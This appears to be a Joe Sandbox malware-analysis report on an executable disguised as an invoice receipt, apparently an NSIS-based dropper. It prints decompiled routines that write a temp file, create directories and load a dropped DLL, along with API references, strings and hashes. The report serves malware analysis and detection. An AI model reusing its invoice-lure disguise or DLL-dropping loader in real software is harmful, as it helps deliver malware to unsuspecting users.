"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" , xrefs: 00402C68
Error launching installer, xrefs: 00402CAB
Null, xrefs: 00402D54
C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
soft, xrefs: 00402D4B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3192361947
Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\hardz\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\hardz\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040264e
0x0040264e
0x0040287d
0x00402880
0x00402880
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402886
0x00402886
0x00402886
0x00401833
0x00401833
0x00401834
0x00401492
0x00402200
0x00402200
0x00402200
0x00401831
0x0040182a
0x00402888
0x0040288c
0x0040288c
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x004021fb
0x00000000
0x004021fb
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,pzusn,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,pzusn,pzusn,00000000,00000000,pzusn,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

pzusn, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll, xrefs: 00401801, 0040181D
C:\Users\user\AppData\Local\Temp\nsiCC2.tmp, xrefs: 0040177E, 004017ED, 0040180B
C:\Users\user\AppData\Local\Temp, xrefs: 00401761

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsiCC2.tmp$C:\Users\user\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll$pzusn
API String ID: 1941528284-2053102684
Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f06
0x00402f10
0x00402f19
0x00402f1d
0x00402f28
0x00402f28
0x00402f30
0x00402f32
0x00402f39
0x00402f55
0x00402f59
0x00403022
0x00403022
0x00000000
0x00402f68
0x00402f6b
0x00402f71
0x00402f78
0x00402f7b
0x00402f84
0x00402ff1
0x00402ff7
0x00402ff9
0x00402ff9
0x0040300b
0x0040300f
0x00000000
0x00403011
0x00403011
0x00403014
0x0040301a
0x00000000
0x0040301a
0x00402f86
0x00402f89
0x0040301d
0x0040301d
0x00402f8f
0x00402f94
0x00402f94
0x00402f9c
0x00402f9e
0x00402f9e
0x00402faf
0x00402fb3
0x00000000
0x00000000
0x00402fc7
0x00402fcf
0x00402fed
0x00403024
0x00403024
0x00402fd6
0x00402fd6
0x00402fd9
0x00402fdc
0x00402fdf
0x00402fe9
0x00000000
0x00402feb
0x00000000
0x00402feb
0x00402fe9
0x00000000
0x00402fcf
0x00000000
0x00402f94
0x00402f89
0x00402f84
0x00402f7b
0x00402f59
0x00403025
0x00403029

APIs

SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7

Strings

80A, xrefs: 00402F8F

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: 80A
API String ID: 2113905535-195308239
Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040302C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x4d9a0
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					_t12 =  *0x417040; // 0xa1e47
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						_t22 =  *0x41f048; // 0x41253
						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
						E00402BC5(0);
					}
					 *0x40afd0 = 0x40b038;
					 *0x40afd4 = 0x8000; // executed
					_t16 = E00405E9D(0x40afb0); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd0; // 0x4107e6
					_t40 = _t39 - 0x40b038;
					if(_t40 == 0) {
						__eflags =  *0x40afcc; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41703c; // 0x4d9a0
						if(_t18 -  *0x40afa8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409014, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afa8 =  *0x40afa8 + _t40;
						_t53 =  *0x40afcc; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x00403030
0x0040303d
0x00403050
0x00403055
0x00403196
0x00403198
0x00000000
0x0040319e
0x00403061
0x00403074
0x0040307a
0x00403080
0x0040308b
0x0040308b
0x00403090
0x00403095
0x0040309d
0x0040309f
0x0040309f
0x004030a8
0x004030af
0x00000000
0x00000000
0x004030b5
0x004030bb
0x004030c1
0x00000000
0x004030c7
0x004030cd
0x004030d7
0x004030ed
0x004030f2
0x004030f7
0x004030fd
0x00403103
0x0040310d
0x00403114
0x00000000
0x00000000
0x00403116
0x0040311c
0x0040311e
0x00403152
0x00403158
0x00000000
0x00000000
0x0040315a
0x0040315c
0x00000000
0x00000000
0x0040315e
0x0040315e
0x00403171
0x00000000
0x00000000
0x00403180
0x00000000
0x00403180
0x0040312e
0x00403136
0x0040318d
0x00403193
0x00403193
0x00000000
0x0040313e
0x0040313e
0x00403144
0x0040314a
0x00000000
0x00000000
0x00000000
0x00403150
0x00403191
0x00403191
0x00000000
0x00403191
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403041

Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
WriteFile.KERNELBASE(0040B038,004107E6,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
SetFilePointer.KERNELBASE(0004D9A0,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180

Strings

80A, xrefs: 004030A1

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: 80A
API String ID: 2146148272-195308239
Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x0040200b
0x00402156
0x00402156
0x0040287d
0x00402880
0x0040288c
0x0040288c
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f8c
0x00401f92
0x00401f96
0x00402004
0x00000000
0x00402004
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00401ff9
0x00401ff9
0x00000000
0x00401ff2
0x00401f7c
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
